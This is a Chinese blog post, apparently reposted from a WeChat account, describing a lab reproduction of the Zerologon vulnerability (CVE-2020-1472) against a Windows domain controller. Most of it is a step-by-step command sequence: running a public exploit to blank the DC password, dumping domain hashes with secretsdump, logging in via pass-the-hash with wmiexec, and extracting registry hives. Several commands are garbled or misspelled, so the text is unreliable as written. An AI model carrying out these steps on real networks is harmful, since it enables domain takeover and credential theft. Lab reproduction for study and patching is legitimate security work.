CVE-2020-1472漏洞复现

admin

139544
文章

114
评论

2024年12月18日22:40:57评论8 views字数 1956阅读6分31秒阅读模式

漏洞描述

攻击者使用Netlogon远程协议建立与域控制器连接的Netlogon安全通道时，存在特权提升漏洞，当成功利用时，攻击者可以无需通过身份验证，在网络中的设备上运行经过特殊设计的应用程序，获取域控制器的管理员权限。

原理：Netlogon使用的AES认证算法中vi向量默认为0，导致攻击者可以绕过认证，同时其设置域控密码的远程接口也使用了该函数，导致可以将域控中保存在AD中的管理理员密码置空。

影响范围

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

复现环境

DC：

版本：windows server 2012R2

IP:192.168.111.133/24

Kali:

IP：192.168.111.128/24

Python:3.8.6

复现过程

下载检测工具检测是否存在漏洞：

git clone https://github.com/SecuraBV/CVE-2020-1472cd CVE-2020-1472

python3 zerologon tester.py 域控的计算机名域控IP

如图：显示susccess! 证明可能存在此漏洞

安装impacke：

git clone https://github.co/SecureAuthCorp/impacket

cd impacket pip install

下载CVE-2020-142 exp：

cd examplesgit clone https://github.com/dirkjanm/CVE-2020-1472

置空域控保存在AD中的密码：

python cve-2020-1472-explit.py 域控计算机名域控IP

抓取域控用户的Hash：

通过secresdump.py来获取域控相关hash

Python secretsdump.py 域/域控计算机名$@域控ip -jus-dc -no-pass

利用获取的hash 去做登陆:

Python wmiexec.py -hashes 账户哈希域/账户名@域控IP

可以看到成功登陆域控机

抓取SAM文件中原来的HASH到本地:

reg save HKLMSYSTEM system.savereg save HKLMSAM sam.exereg save HKLMSECURITY security.savelget system.savelget sam.savelget security.save

退出shell破解提取到的hash，记住password_hex后的那一串

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

下载hash恢复工具:

git clone https://github.com/risksense/zerologon

用命令恢复原来的密码:

python reinstall_original_pw.py 域控计算机名域控IP 保存的那串hash值

再次用nopass尝试抓取域控的用户hash，验证是否成功恢复

注：文章仅参考学习，若有侵权联系删除

往期精彩推荐

记一次搭建靶场渗透过程（1）

记一次搭建靶场渗透过程（2）

记一次搭建靶场渗透过程（3）

CVE-2020-1472漏洞复现

团队介绍

银河护卫队super，是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍，定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。

点击关注银河护卫队super

原文始发于微信公众号（银河护卫队super）：CVE-2020-1472漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2020-1472漏洞复现

同步漏洞行动：朝鲜Lazarus APT组织针对韩国供应链发起攻击

Vulnhub-zico2靶机教学

使用 PowerShell 中的动态 API 解析绕过 AMSI

Sunder：旨在利用 BYOVD 漏洞的 Windows rootkit

浅谈常见edu漏洞，逻辑漏洞，越权，接管到getshell，小白如何快速找准漏洞

【云安全】k8s漏洞合集 | k8s安全攻防

Doppelganger项目 - 模仿灵魂，不留痕迹

SpEL表达式漏洞注入内存马

挖洞小记 | 记一次拿下某软柿子证书站过程！

渗透测试 FastJSON 是个延时炸弹？

发表评论

在线咨询

微信